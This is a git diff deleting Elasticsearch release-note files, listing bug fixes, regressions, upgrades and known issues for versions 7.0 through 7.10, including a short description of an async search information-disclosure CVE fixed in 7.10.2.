parser config {es-pull}35935[#35935] -* Fix find_file_structure NPE with should_trim_fields {es-pull}35465[#35465] (issue: {es-issue}35462[#35462]) -* Prevent notifications being created on deletion of a non existent job {es-pull}35337[#35337] (issues: {es-issue}34058[#34058], {es-issue}35336[#35336]) -* Clear Job#finished_time when it is opened (#32605) {es-pull}32755[#32755] -* Fix thread leak when waiting for job flush (#32196) {es-pull}32541[#32541] (issue: {es-issue}32196[#32196]) -* Fix CPoissonMeanConjugate sampling error. {ml-pull}335[#335] -* Report index unavailable instead of waiting for lazy node {es-pull}38423[#38423] -* Fix error race condition on stop _all datafeeds and close _all jobs {es-pull}38113[#38113] (issue: {es-issue}37959[#37959]) -* Update ML results mappings on process start {es-pull}37706[#37706] (issue: {es-issue}37607[#37607]) -* Prevent submit after autodetect worker is stopped {es-pull}37700[#37700] (issue: {es-issue}37108[#37108]) -* Fix ML datafeed CCS with wildcarded cluster name {es-pull}37470[#37470] (issue: {es-issue}36228[#36228]) -* Update error message for process update {es-pull}37363[#37363] -* Wait for autodetect to be ready in the datafeed {es-pull}37349[#37349] (issues: {es-issue}36810[#36810], {es-issue}37227[#37227]) -* Stop datafeeds running when their jobs are stale {es-pull}37227[#37227] (issue: {es-issue}36810[#36810]) -* Order GET job stats response by job id {es-pull}36841[#36841] (issue: {es-issue}36683[#36683]) -* Make GetJobStats work with arbitrary wildcards and groups {es-pull}36683[#36683] (issue: {es-issue}34745[#34745]) -* Fix datafeed skipping first bucket after lookback when aggs are … {es-pull}39859[#39859] (issue: {es-issue}39842[#39842]) -* Refactoring lazy query and agg parsing {es-pull}39776[#39776] (issue: {es-issue}39528[#39528]) -* Stop the ML memory tracker before closing node {es-pull}39111[#39111] (issue: {es-issue}37117[#37117]) -* Scrolling datafeed should clear scroll contexts on error {es-pull}40773[#40773] (issue: {es-issue}40772[#40772]) - -Mapping:: -* Ensure that field aliases cannot be used in multi-fields. {es-pull}32219[#32219] -* Treat put-mapping calls with `_doc` as a top-level key as typed calls. {es-pull}38032[#38032] -* Correct deprec log in RestGetFieldMappingAction {es-pull}37843[#37843] (issue: {es-issue}37667[#37667]) -* Restore a noop _all metadata field for 6x indices {es-pull}37808[#37808] (issue: {es-issue}37429[#37429]) -* Make sure PutMappingRequest accepts content types other than JSON. {es-pull}37720[#37720] -* Make sure to use the resolved type in DocumentMapperService#extractMappings. {es-pull}37451[#37451] (issue: {es-issue}36811[#36811]) -* Improve Precision for scaled_float {es-pull}37169[#37169] (issue: {es-issue}32570[#32570]) -* Make sure to accept empty unnested mappings in create index requests. {es-pull}37089[#37089] -* Stop automatically nesting mappings in index creation requests. {es-pull}36924[#36924] -* Rewrite SourceToParse with resolved docType {es-pull}36921[#36921] (issues: {es-issue}35790[#35790], {es-issue}36769[#36769]) -* Optimise rejection of out-of-range `long` values {es-pull}40325[#40325] (issues: {es-issue}26137[#26137], {es-issue}40323[#40323]) -* Make sure to reject mappings with type _doc when include_type_name is false. {es-pull}38270[#38270] (issue: {es-issue}38266[#38266]) - -Network:: -* Adjust SSLDriver behavior for JDK11 changes {es-pull}32145[#32145] (issues: {es-issue}32122[#32122], {es-issue}32144[#32144]) -* Netty4SizeHeaderFrameDecoder error {es-pull}31057[#31057] -* Fix memory leak in http pipelining {es-pull}30815[#30815] (issue: {es-issue}30801[#30801]) -* Fix issue with finishing handshake in ssl driver {es-pull}30580[#30580] -* Do not resolve addresses in remote connection info {es-pull}36671[#36671] (issue: {es-issue}35658[#35658]) -* Always compress based on the settings {es-pull}36522[#36522] (issue: {es-issue}36399[#36399]) -* http.publish_host Should Contain CNAME {es-pull}32806[#32806] (issue: {es-issue}22029[#22029]) -* Adjust SSLDriver behavior for JDK11 changes {es-pull}32145[#32145] (issues: {es-issue}32122[#32122], {es-issue}32144[#32144]) -* Add TRACE, CONNECT, and PATCH http methods {es-pull}31035[#31035] (issue: {es-issue}31017[#31017]) -* Transport client: Don't validate node in handshake {es-pull}30737[#30737] (issue: {es-issue}30141[#30141]) -* Fix issue with finishing handshake in ssl driver {es-pull}30580[#30580] -* Remove potential nio selector leak {es-pull}27825[#27825] -* Fix issue where the incorrect buffers are written {es-pull}27695[#27695] (issue: {es-issue}27551[#27551]) -* Do not set SO_LINGER on server channels {es-pull}26997[#26997] -* Do not set SO_LINGER to 0 when not shutting down {es-pull}26871[#26871] (issue: {es-issue}26764[#26764]) -* Release pipelined http responses on close {es-pull}26226[#26226] -* Reload SSL context on file change for LDAP {es-pull}36937[#36937] (issues: {es-issue}30509[#30509], {es-issue}36923[#36923]) -* Do not resolve addresses in remote connection info {es-pull}36671[#36671] (issue: {es-issue}35658[#35658]) - -Packaging:: -* Fix error message when package install fails due to missing Java {es-pull}36077[#36077] (issue: {es-issue}31845[#31845]) -* Add missing entries to conffiles {es-pull}35810[#35810] (issue: {es-issue}35691[#35691]) - -Plugins:: -* Ensure that azure stream has socket privileges {es-pull}28751[#28751] (issue: {es-issue}28662[#28662]) - -Ranking:: -* QueryRescorer should keep the window size when rewriting {es-pull}36836[#36836] - -Recovery:: -* Register ResyncTask.Status as a NamedWriteable {es-pull}36610[#36610] -* RecoveryMonitor#lastSeenAccessTime should be volatile {es-pull}36781[#36781] -* Create retention leases file during recovery {es-pull}39359[#39359] (issue: {es-issue}37165[#37165]) -* Recover peers from translog, ignoring soft deletes {es-pull}38904[#38904] (issue: {es-issue}37165[#37165]) -* Retain history for peer recovery using leases {es-pull}38855[#38855] -* Resync should not send operations without sequence number {es-pull}40433[#40433] - -Rollup:: -* Fix rollup search statistics {es-pull}36674[#36674] -* Fix Rollup's metadata parser {es-pull}36791[#36791] (issue: {es-issue}36726[#36726]) -* Fix rollup search statistics {es-pull}36674[#36674] -* Remove timezone validation on rollup range queries {es-pull}40647[#40647] -* Rollup ignores time_zone on date histogram {es-pull}40844[#40844] - -Scripting:: -* Properly support no-offset date formatting {es-pull}36316[#36316] (issue: {es-issue}36306[#36306]) -* [Painless] Generate Bridge Methods {es-pull}36097[#36097] -* Fix serialization bug in painless execute api request {es-pull}36075[#36075] (issue: {es-issue}36050[#36050]) -* Actually add joda time back to whitelist {es-pull}35965[#35965] (issue: {es-issue}35915[#35915]) -* Add back joda to whitelist {es-pull}35915[#35915] (issue: {es-issue}35913[#35913]) - -Settings:: -* Correctly Identify Noop Updates {es-pull}36560[#36560] (issue: {es-issue}36496[#36496]) - -Search:: -* Ensure realtime `_get` and `_termvectors` don't run on the network thread {es-pull}33814[#33814] (issue: {es-issue}27500[#27500]) -* [bug] fuzziness custom auto {es-pull}33462[#33462] (issue: {es-issue}33454[#33454]) -* Fix inner hits retrieval when stored fields are disabled (_none_) {es-pull}33018[#33018] (issue: {es-issue}32941[#32941]) -* Set maxScore for empty TopDocs to Nan rather than 0 {es-pull}32938[#32938] -* Handle leniency for cross_fields type in multi_match query {es-pull}27045[#27045] (issue: {es-issue}23210[#23210]) -* Raise IllegalArgumentException instead if query validation failed {es-pull}26811[#26811] (issue: {es-issue}26799[#26799]) -* Inner hits fail to propagate doc-value format. {es-pull}36310[#36310] -* Fix custom AUTO issue with Fuzziness#toXContent {es-pull}35807[#35807] (issue: {es-issue}33462[#33462]) -* Fix analyzed prefix query in query_string {es-pull}35756[#35756] (issue: {es-issue}31702[#31702]) -* Fix problem with MatchNoDocsQuery in disjunction queries {es-pull}35726[#35726] (issue: {es-issue}34708[#34708]) -* Fix phrase_slop in query_string query {es-pull}35533[#35533] (issue: {es-issue}35125[#35125]) -* Add a More Like This query routing requirement check (#29678) {es-pull}33974[#33974] -* Look up connection using the right cluster alias when releasing contexts {es-pull}38570[#38570] -* Fix fetch source option in expand search phase {es-pull}37908[#37908] (issue: {es-issue}23829[#23829]) -* Change `rational` to `saturation` in script_score {es-pull}37766[#37766] (issue: {es-issue}37714[#37714]) -* Throw if two inner_hits have the same name {es-pull}37645[#37645] (issue: {es-issue}37584[#37584]) -* Ensure either success or failure path for SearchOperationListener is called {es-pull}37467[#37467] (issue: {es-issue}37185[#37185]) -* `query_string` should use indexed prefixes {es-pull}36895[#36895] -* Avoid duplicate types deprecation messages in search-related APIs. {es-pull}36802[#36802] -* Serialize top-level pipeline aggs as part of InternalAggregations {es-pull}40177[#40177] (issues: {es-issue}40059[#40059], {es-issue}40101[#40101]) -* CCS: Skip empty search hits when minimizing round-trips {es-pull}40098[#40098] (issues: {es-issue}32125[#32125], {es-issue}40067[#40067]) -* CCS: Disable minimizing round-trips when dfs is requested {es-pull}40044[#40044] (issue: {es-issue}32125[#32125]) -* Fix Fuzziness#asDistance(String) {es-pull}39643[#39643] (issue: {es-issue}39614[#39614]) -* Fix alias resolution runtime complexity. {es-pull}40263[#40263] (issue: {es-issue}40248[#40248]) - -Security:: -* Handle 6.4.0+ BWC for Application Privileges {es-pull}32929[#32929] -* Remove license state listeners on closeables {es-pull}36308[#36308] (issues: {es-issue}33328[#33328], {es-issue}35627[#35627], {es-issue}35628[#35628]) -* Fix exit code for Security CLI tools {es-pull}37956[#37956] (issue: {es-issue}37841[#37841]) -* Fix potential NPE in UsersTool {es-pull}37660[#37660] -* Remove dynamic objects from security index {es-pull}40499[#40499] (issue: {es-issue}35460[#35460]) -* Fix libs:ssl-config project setup {es-pull}39074[#39074] -* Do not create the missing index when invoking getRole {es-pull}39039[#39039] - -Snapshot/Restore:: -* Upgrade GCS Dependencies to 1.55.0 {es-pull}36634[#36634] (issues: {es-issue}35229[#35229], {es-issue}35459[#35459]) -* Improve Resilience SnapshotShardService {es-pull}36113[#36113] (issue: {es-issue}32265[#32265]) -* Keep SnapshotsInProgress State in Sync with Routing Table {es-pull}35710[#35710] -* Ensure that gcs client creation is privileged {es-pull}25938[#25938] (issue: {es-issue}25932[#25932]) -* Make calls to CloudBlobContainer#exists privileged {es-pull}25937[#25937] (issue: {es-issue}25931[#25931]) -* Fix Concurrent Snapshot Ending And Stabilize Snapshot Finalization {es-pull}38368[#38368] (issue: {es-issue}38226[#38226]) -* Fix Two Races that Lead to Stuck Snapshots {es-pull}37686[#37686] (issues: {es-issue}32265[#32265], {es-issue}32348[#32348]) -* Fix Race in Concurrent Snapshot Delete and Create {es-pull}37612[#37612] (issue: {es-issue}37581[#37581]) -* Streamline S3 Repository- and Client-Settings {es-pull}37393[#37393] -* Blob store compression fix {es-pull}39073[#39073] - -SQL:: -* Fix translation of LIKE/RLIKE keywords {es-pull}36672[#36672] (issues: {es-issue}36039[#36039], {es-issue}36584[#36584]) -* Scripting support for casting functions CAST and CONVERT {es-pull}36640[#36640] (issue: {es-issue}36061[#36061]) -* Fix translation to painless for conditionals {es-pull}36636[#36636] (issue: {es-issue}36631[#36631]) -* Concat should be always not nullable {es-pull}36601[#36601] (issue: {es-issue}36169[#36169]) -* Fix MOD() for long and integer arguments {es-pull}36599[#36599] (issue: {es-issue}36364[#36364]) -* Fix issue with complex HAVING and GROUP BY ordinal {es-pull}36594[#36594] (issue: {es-issue}36059[#36059]) -* Be lenient for tests involving comparison to H2 but strict for csv spec tests {es-pull}36498[#36498] (issue: {es-issue}36483[#36483]) -* Non ISO 8601 versions of DAY_OF_WEEK and WEEK_OF_YEAR functions {es-pull}36358[#36358] (issue: {es-issue}36263[#36263]) -* Do not ignore all fields whose names start with underscore {es-pull}36214[#36214] (issue: {es-issue}36206[#36206]) -* Fix issue with wrong data type for scripted Grouping keys {es-pull}35969[#35969] (issue: {es-issue}35662[#35662]) -* Fix translation of math functions to painless {es-pull}35910[#35910] (issue: {es-issue}35654[#35654]) -* Fix jdbc jar to include deps {es-pull}35602[#35602] -* Fix query translation for scripted queries {es-pull}35408[#35408] (issue: {es-issue}35232[#35232]) -* Clear the cursor if nested inner hits are enough to fulfill the query required limits {es-pull}35398[#35398] (issue: {es-issue}35176[#35176]) -* Introduce IsNull node to simplify expressions {es-pull}35206[#35206] (issues: {es-issue}34876[#34876], {es-issue}35171[#35171]) -* The SSL default configuration shouldn't override the https protocol if used {es-pull}34635[#34635] (issue: {es-issue}33817[#33817]) -* Minor fix for javadoc {es-pull}32573[#32573] (issue: {es-issue}32553[#32553]) -* Prevent grouping over grouping functions {es-pull}38649[#38649] (issue: {es-issue}38308[#38308]) -* Relax StackOverflow circuit breaker for constants {es-pull}38572[#38572] (issue: {es-issue}38571[#38571]) -* Fix issue with IN not resolving to underlying keyword field {es-pull}38440[#38440] (issue: {es-issue}38424[#38424]) -* Change the Intervals milliseconds precision to 3 digits {es-pull}38297[#38297] (issue: {es-issue}37423[#37423]) -* Fix esType for DATETIME/DATE and INTERVALS {es-pull}38179[#38179] (issue: {es-issue}38051[#38051]) -* Added SSL configuration options tests {es-pull}37875[#37875] (issue: {es-issue}37711[#37711]) -* Fix casting from date to numeric type to use millis {es-pull}37869[#37869] (issue: {es-issue}37655[#37655]) -* Fix BasicFormatter NPE {es-pull}37804[#37804] -* Return Intervals in SQL format for CLI {es-pull}37602[#37602] (issues: {es-issue}29970[#29970], {es-issue}36186[#36186], {es-issue}36432[#36432]) -* Fix object extraction from sources {es-pull}37502[#37502] (issue: {es-issue}37364[#37364]) -* Fix issue with field names containing "." {es-pull}37364[#37364] (issue: {es-issue}37128[#37128]) -* Fix bug regarding alias fields with dots {es-pull}37279[#37279] (issue: {es-issue}37224[#37224]) -* Proper handling of COUNT(field_name) and COUNT(DISTINCT field_name) {es-pull}37254[#37254] (issue: {es-issue}30285[#30285]) -* Fix COUNT DISTINCT filtering {es-pull}37176[#37176] (issue: {es-issue}37086[#37086]) -* Fix issue with wrong NULL optimization {es-pull}37124[#37124] (issue: {es-issue}35872[#35872]) -* Fix issue with complex expression as args of PERCENTILE/_RANK {es-pull}37102[#37102] (issue: {es-issue}37099[#37099]) -* Handle the bwc Joda ZonedDateTime scripting class in Painless {es-pull}37024[#37024] (issue: {es-issue}37023[#37023]) -* Fix bug regarding histograms usage in scripting {es-pull}36866[#36866] -* Fix issue with always false filter involving functions {es-pull}36830[#36830] (issue: {es-issue}35980[#35980]) -* Protocol returns ISO 8601 String formatted dates instead of Long for JDBC/ODBC requests {es-pull}36800[#36800] (issue: {es-issue}36756[#36756]) -* Enhance Verifier to prevent aggregate or grouping functions from {es-pull}36799[#36799] (issue: {es-issue}36798[#36798]) -* Fix translation of LIKE/RLIKE keywords {es-pull}36672[#36672] (issues: {es-issue}36039[#36039], {es-issue}36584[#36584]) -* Scripting support for casting functions CAST and CONVERT {es-pull}36640[#36640] (issue: {es-issue}36061[#36061]) -* Concat should be always not nullable {es-pull}36601[#36601] (issue: {es-issue}36169[#36169]) -* Fix issue with complex HAVING and GROUP BY ordinal {es-pull}36594[#36594] (issue: {es-issue}36059[#36059]) -* Add missing handling of IP field in JDBC {es-pull}40384[#40384] (issue: {es-issue}40358[#40358]) -* Fix metric aggs on date/time to not return double {es-pull}40377[#40377] (issues: {es-issue}39492[#39492], {es-issue}40376[#40376]) -* CAST supports both SQL and ES types {es-pull}40365[#40365] (issue: {es-issue}40282[#40282]) -* Fix RLIKE bug and improve testing for RLIKE statement {es-pull}40354[#40354] (issues: {es-issue}34609[#34609], {es-issue}39931[#39931]) -* Unwrap the first value in an array in case of array leniency {es-pull}40318[#40318] (issue: {es-issue}40296[#40296]) -* Preserve original source for cast/convert function {es-pull}40271[#40271] (issue: {es-issue}40239[#40239]) -* Fix LIKE function equality by considering its pattern as well {es-pull}40260[#40260] (issue: {es-issue}39931[#39931]) -* Fix issue with optimization on queries with ORDER BY/LIMIT {es-pull}40256[#40256] (issue: {es-issue}40211[#40211]) -* Rewrite ROUND and TRUNCATE functions with a different optional parameter handling method {es-pull}40242[#40242] (issue: {es-issue}40001[#40001]) -* Fix issue with getting DATE type in JDBC {es-pull}40207[#40207] -* Fix issue with date columns returned always in UTC {es-pull}40163[#40163] (issue: {es-issue}40152[#40152]) -* Add multi_value_field_leniency inside FieldHitExtractor {es-pull}40113[#40113] (issue: {es-issue}39700[#39700]) -* Fix incorrect ordering of groupings (GROUP BY) based on orderings (ORDER BY) {es-pull}40087[#40087] (issue: {es-issue}39956[#39956]) -* Fix bug with JDBC timezone setting and DATE type {es-pull}39978[#39978] (issue: {es-issue}39915[#39915]) -* Use underlying exact field for LIKE/RLIKE {es-pull}39443[#39443] (issue: {es-issue}39442[#39442]) -* Fix display size for DATE/DATETIME {es-pull}40669[#40669] -* Have LIKE/RLIKE use wildcard and regexp queries {es-pull}40628[#40628] (issue: {es-issue}40557[#40557]) -* Fix getTime() methods in JDBC {es-pull}40484[#40484] -* SYS TABLES: enumerate tables of requested types {es-pull}40535[#40535] (issue: {es-issue}40348[#40348]) -* Passing an input to the CLI "freezes" the CLI after displaying an error message {es-pull}40164[#40164] (issue: {es-issue}40557[#40557]) -* Wrap ZonedDateTime parameters inside scripts {es-pull}39911[#39911] (issue: {es-issue}39877[#39877]) -* ConstantProcessor can now handle NamedWriteable {es-pull}39876[#39876] (issue: {es-issue}39875[#39875]) -* Extend the multi dot field notation extraction to lists of values {es-pull}39823[#39823] (issue: {es-issue}39738[#39738]) -* Values in datetime script aggs should be treated as long {es-pull}39773[#39773] (issue: {es-issue}37042[#37042]) -* Don't allow inexact fields for MIN/MAX {es-pull}39563[#39563] (issue: {es-issue}39427[#39427]) -* Fix merging of incompatible multi-fields {es-pull}39560[#39560] (issue: {es-issue}39547[#39547]) -* Fix COUNT DISTINCT column name {es-pull}39537[#39537] (issue: {es-issue}39511[#39511]) -* Enable accurate hit tracking on demand {es-pull}39527[#39527] (issue: {es-issue}37971[#37971]) -* Ignore UNSUPPORTED fields for JDBC and ODBC modes in 'SYS COLUMNS' {es-pull}39518[#39518] (issue: {es-issue}39471[#39471]) -* Enforce JDBC driver - ES server version parity {es-pull}38972[#38972] (issue: {es-issue}38775[#38775]) -* Fall back to using the field name for column label {es-pull}38842[#38842] (issue: {es-issue}38831[#38831]) - -Suggesters:: -* Fix duplicate removal when merging completion suggestions {es-pull}36996[#36996] (issue: {es-issue}35836[#35836]) - -Task Management:: -* Un-assign persistent tasks as nodes exit the cluster {es-pull}37656[#37656] - -Watcher:: -* Watcher accounts constructed lazily {es-pull}36656[#36656] -* Only trigger a watch if new or schedule/changed {es-pull}35908[#35908] -* Fix Watcher NotificationService's secure settings {es-pull}35610[#35610] (issue: {es-issue}35378[#35378]) -* Fix integration tests to ensure correct start/stop of Watcher {es-pull}35271[#35271] (issues: {es-issue}29877[#29877], {es-issue}30705[#30705], {es-issue}33291[#33291], {es-issue}34448[#34448], {es-issue}34462[#34462]) - -ZenDiscovery:: -* Remove duplicate discovered peers {es-pull}35505[#35505] -* Respect the no_master_block setting {es-pull}36478[#36478] -* Cancel GetDiscoveredNodesAction when bootstrapped {es-pull}36423[#36423] (issues: {es-issue}36380[#36380], {es-issue}36381[#36381]) -* Only elect master-eligible nodes {es-pull}35996[#35996] -* Remove duplicate discovered peers {es-pull}35505[#35505] -* Fix size of rolling-upgrade bootstrap config {es-pull}38031[#38031] -* Always return metadata version if metadata is requested {es-pull}37674[#37674] -* Elect freshest master in upgrade {es-pull}37122[#37122] (issue: {es-issue}40[#40]) -* Fix cluster state persistence for single-node discovery {es-pull}36825[#36825] - -[[regression-7.0.0]] -[discrete] -=== Regressions - -Infra/Core:: -* Restore date aggregation performance in UTC case {es-pull}38221[#38221] (issue: {es-issue}37826[#37826]) -* Speed up converting of temporal accessor to zoned date time {es-pull}37915[#37915] (issue: {es-issue}37826[#37826]) - -Mapping:: -* Performance fix. Reduce deprecation calls for the same bulk request {es-pull}37415[#37415] (issue: {es-issue}37411[#37411]) - -Scripting:: -* Use Number as a return value for BucketAggregationScript {es-pull}35653[#35653] (issue: {es-issue}35351[#35351]) - -[[upgrade-7.0.0]] -[discrete] -=== Upgrades - -Discovery-Plugins:: -* Bump jackson-databind version for AWS SDK {es-pull}39183[#39183] - -Engine:: -* Upgrade to lucene-8.0.0-snapshot-83f9835. {es-pull}37668[#37668] -* Upgrade to Lucene 8.0.0-snapshot-ff9509a8df {es-pull}39350[#39350] -* Upgrade to Lucene 8.0.0 {es-pull}39992[#39992] (issue: {es-issue}39640[#39640]) - -Geo:: -* Upgrade JTS to 1.14.0 {es-pull}29141[#29141] (issue: {es-issue}29122[#29122]) - -Ingest:: -* Update geolite2 database in ingest geoip plugin {es-pull}33840[#33840] -* Bump jackson-databind version for ingest-geoip {es-pull}39182[#39182] - -Infra/Core:: -* Upgrade to a Lucene 8 snapshot {es-pull}33310[#33310] (issues: {es-issue}32899[#32899], {es-issue}33028[#33028], {es-issue}33309[#33309]) - -Security:: -* Upgrade the bouncycastle dependency to 1.61 {es-pull}40017[#40017] (issue: {es-issue}40011[#40011]) - -Search:: -* Upgrade to Lucene 8.0.0 GA {es-pull}39992[#39992] (issue: {es-issue}39640[#39640]) - -Snapshot/Restore:: -* plugins/repository-gcs: Update google-cloud-storage/core to 1.59.0 {es-pull}39748[#39748] (issue: {es-issue}39366[#39366]) - -Network:: -* Fix Netty Leaks by upgrading to 4.1.28 {es-pull}32511[#32511] (issue: {es-issue}32487[#32487]) -* Upgrade Netty 4.3.32.Final {es-pull}36102[#36102] (issue: {es-issue}35360[#35360]) - -Machine Learning:: -* No need to add state doc mapping on job open in 7.x {es-pull}37759[#37759] diff --git a/docs/reference/release-notes/7.1.asciidoc b/docs/reference/release-notes/7.1.asciidoc deleted file mode 100644 index ea7d4ac2475..00000000000 --- a/docs/reference/release-notes/7.1.asciidoc +++ /dev/null @@ -1,77 +0,0 @@ -[[release-notes-7.1.1]] -== {es} version 7.1.1 - -Also see <>. - -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likeliness of this -corruption in the case that deletes/updates would be applied by mistake. This -bug is fixed in {es} 7.7 and later versions. More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -https://github.com/elastic/elasticsearch/pull/52555 -This is fixed in {es} 7.7 and later versions. - -[[bug-7.1.1]] -[discrete] -=== Bug fixes - -Distributed:: -* Avoid unnecessary persistence of retention leases {es-pull}42299[#42299] -* Execute actions under permit in primary mode only {es-pull}42241[#42241] (issues: {es-issue}40386[#40386], {es-issue}41686[#41686]) - -Infra/REST API:: -* Remove deprecated _source_exclude and _source_include from get API spec {es-pull}42188[#42188] - -[[release-notes-7.1.0]] -== {es} version 7.1.0 - -Also see <>. - -[[enhancement-7.1.0]] -[discrete] -=== Enhancements - -Security:: -* Moved some security features to basic. See {ref-bare/release-highlights-7.1.0.html[7.1.0 Release highlights]. - -Authentication:: -* Log warning when unlicensed realms are skipped {es-pull}41778[#41778] - -Infra/Settings:: -* Drop distinction in entries for keystore {es-pull}41701[#41701] - - -[[bug-7.1.0]] -[discrete] -=== Bug fixes - -Cluster Coordination:: -* Handle serialization exceptions during publication {es-pull}41781[#41781] (issue: {es-issue}41090[#41090]) - -Infra/Core:: -* Fix fractional seconds for strict_date_optional_time {es-pull}41871[#41871] (issue: {es-issue}41633[#41633]) - -Network:: -* Enforce transport TLS on Basic with Security {es-pull}42150[#42150] - -Reindex:: -* Allow reindexing into write alias {es-pull}41677[#41677] (issue: {es-issue}41667[#41667]) - -SQL:: -* SQL: Fix issue regarding INTERVAL * number {es-pull}42014[#42014] (issue: {es-issue}41239[#41239]) -* SQL: Remove CircuitBreaker from parser {es-pull}41835[#41835] (issue: {es-issue}41471[#41471]) - -Search:: -* Fix IAE on cross_fields query introduced in 7.0.1 {es-pull}41938[#41938] (issues: {es-issue}41125[#41125], {es-issue}41934[#41934]) - - - - diff --git a/docs/reference/release-notes/7.10.asciidoc b/docs/reference/release-notes/7.10.asciidoc deleted file mode 100644 index 0ac5a4510a5..00000000000 --- a/docs/reference/release-notes/7.10.asciidoc +++ /dev/null @@ -1,479 +0,0 @@ -[[release-notes-7.10.2]] -== {es} version 7.10.2 - -Also see <>. - -[discrete] -[[security-updates-7.10.2]] -=== Security updates - -* An information disclosure flaw was found in the {es} async search API. -Users who execute an async search will store the HTTP headers. -A user with the ability to read the `.tasks` index could obtain -sensitive request headers of other users in the cluster. -All versions of {es} between 7.7.0 and 7.10.1 are affected by this flaw. -You must upgrade to {es} version 7.10.2 to obtain the fix. -https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22132[CVE-2021-22132] - -[[bug-7.10.2]] -[float] -=== Bug fixes - -EQL:: -* Fix early trimming of in-flight data {es-pull}66493[#66493] - -Engine:: -* Fix the earliest last modified age of translog issue. {es-pull}64753[#64753] -* Fix the version and term field initialization error of NoOpResult {es-pull}66269[#66269] (issue: {es-issue}66267[#66267]) - -Features/Data streams:: -* Allow more legit cases in Metadata.Builder.validateDataStreams {es-pull}65791[#65791] - -Features/Features:: -* Make FilterAllocationDecider totally ignore tier-based allocation settings {es-pull}67019[#67019] (issue: {es-issue}66679[#66679]) - -Features/Ingest:: -* Fix whitespace as a separator in CSV processor {es-pull}67045[#67045] (issue: {es-issue}67013[#67013]) - -Highlighting:: -* Fix bug where fvh fragments could be loaded from wrong doc {es-pull}65641[#65641] (issues: {es-issue}60179[#60179], {es-issue}65533[#65533]) - -Features/ILM+SLM:: -* Create AllocationDeciders in the main method of the ILM step {es-pull}65037[#65037] (issue: {es-issue}64529[#64529]) - -Infra/REST API:: -* Fix cat tasks api params in spec and handler {es-pull}66272[#66272] (issue: {es-issue}59493[#59493]) -* Mark Cat Tasks API as experimental in rest-api-spec {es-pull}66536[#66536] (issues: {es-issue}51628[#51628], {es-issue}65823[#65823]) -* Mark Task APIs as experimental in rest-api-spec {es-pull}65823[#65823] (issue: {es-issue}51628[#51628]) - -Infra/Scripting:: -* Fix static inner class resolution in Painless {es-pull}67027[#67027] (issue: {es-issue}66823[#66823]) - -Infra/Settings:: -* Correctly determine defaults of settings which depend on other settings {es-pull}65989[#65989] (issue: {es-issue}47890[#47890]) -* Do not interpret SecurityException in KeystoreAwareCommand {es-pull}65366[#65366] - -QL:: -* Handle IP type fields extraction with ignore_malformed property {es-pull}66622[#66622] (issue: {es-issue}66675[#66675]) - -Machine Learning:: -* Change to only calculate model size on initial load to prevent slow cache promotions {es-pull}66451[#66451] - -Network:: -* Ensure notify when proxy connections disconnect {es-pull}65697[#65697] (issue: {es-issue}65443[#65443]) -* Fix AbstractClient#execute Listener Leak {es-pull}65415[#65415] (issue: {es-issue}65405[#65405]) - -SQL:: -* Abort sorting in case of local agg sort queue overflow {es-pull}65687[#65687] (issue: {es-issue}65685[#65685]) -* Verify filter's condition type {es-pull}66268[#66268] (issue: {es-issue}66254[#66254]) - -Search:: -* Fix regressions around nested hits and disabled _source {es-pull}66572[#66572] (issues: {es-issue}60494[#60494], {es-issue}66524[#66524]) -* Make sure shared source always represents the top-level root document {es-pull}66725[#66725] (issues: {es-issue}60494[#60494], {es-issue}66577[#66577]) - -Security:: -* Store and use only internal security headers {es-pull}66365[#66365] - -Snapshot/Restore:: -* Also reroute after shard snapshot size fetch failure {es-pull}65436[#65436] (issues: {es-issue}61906[#61906], {es-issue}64372[#64372]) - - -[[release-notes-7.10.1]] -== {es} version 7.10.1 - -Also see <>. - -[[known-issues-7.10.1]] -[discrete] -=== Known issues -* In {es} 7.10.0 there were several regressions around loading nested documents. These have been addressed in {es} 7.10.2. -** With multiple layers of nested `inner_hits`, we can fail to load the _source. ({es-issue}66577[#66577]) -** With nested `inner_hits`, the fast vector highlighter may load snippets from the wrong document. ({es-issue}65533[#65533]) -** When _source is disabled, we can fail load nested `inner_hits` and `top_hits`. ({es-issue}66572[#66572]) - -[[bug-7.10.1]] -[float] -=== Bug fixes - -Allocation:: -* Fix NPE in toString of FailedShard {es-pull}64770[#64770] - -CCR:: -* Stop renew retention leases when follow task fails {es-pull}65168[#65168] - -CRUD:: -* Propogate rejected execution during bulk actions {es-pull}64842[#64842] (issue: {es-issue}64450[#64450]) - -Cluster Coordination:: -* Fix up roles after rolling upgrade {es-pull}64693[#64693] (issue: {es-issue}62840[#62840]) - -EQL:: -* Allow null tiebreakers inside ordinals/sequences {es-pull}65033[#65033] (issue: {es-issue}64706[#64706]) -* Fix "resource not found" exception on existing EQL async search {es-pull}65167[#65167] (issue: {es-issue}65108[#65108]) -* Fix aggressive/incorrect until policy in sequences {es-pull}65156[#65156] - -Features/ILM+SLM:: -* Fix SetSingleNodeAllocateStep for data tier deployments {es-pull}64679[#64679] - -Features/Watcher:: -* Watcher understands hidden expand wildcard value {es-pull}65332[#65332] (issue: {es-issue}65148[#65148]) - -Geo:: -* Fix handling of null values in geo_point {es-pull}65307[#65307] (issue: {es-issue}65306[#65306]) - -Infra/Core:: -* Fix date math hidden index resolution {es-pull}65236[#65236] (issue: {es-issue}65157[#65157]) - -Infra/Scripting:: -* Fix Painless casting bug in compound assignment for String {es-pull}65329[#65329] -* Revert null-safe behavior to error at run-time instead of compile-time {es-pull}65099[#65099] (issue: {es-issue}65098[#65098]) - -Machine Learning:: -* Extract dependent variable's mapping correctly in case of a multi-field {es-pull}63813[#63813] -* Fix bug with data frame analytics classification test data sampling when using custom feature processors {es-pull}64727[#64727] -* Fix custom feature processor extraction bugs around boolean fields and custom one_hot feature output order {es-pull}64937[#64937] -* Protect against stack overflow while loading data frame analytics data {es-pull}64947[#64947] -* Fix a bug where the peak_model_bytes value of the model_size_stats object was not restored from the anomaly detector job snapshots {ml-pull}1572[#1572] - -Mapping:: -* Correctly serialize search-as-you-type analyzer {es-pull}65359[#65359] (issue: {es-issue}65319[#65319]) -* Unused boost parameter should not throw mapping exception {es-pull}64999[#64999] (issue: {es-issue}64982[#64982]) - -SQL:: -* Fix the return type problem in the sign function {es-pull}64845[#64845] - 